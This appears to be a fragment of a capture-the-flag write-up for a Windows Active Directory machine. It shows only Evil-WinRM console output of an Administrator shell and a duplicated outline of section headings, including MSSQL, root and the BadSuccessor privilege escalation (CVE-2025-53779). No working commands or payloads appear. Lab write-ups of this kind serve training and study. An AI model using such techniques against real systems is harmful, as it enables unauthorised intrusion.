                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline                                                          
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                     
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Machine Info#

Host / IP#

User#

Reconnaissance#

Website#

MSSQL#

Root#

Enumeration#

BadSuccessor(CVE-2025-53779)#

Machine Info

Host / IP

User

Reconnaissance

Website

MSSQL

Root

Enumeration

BadSuccessor(CVE-2025-53779)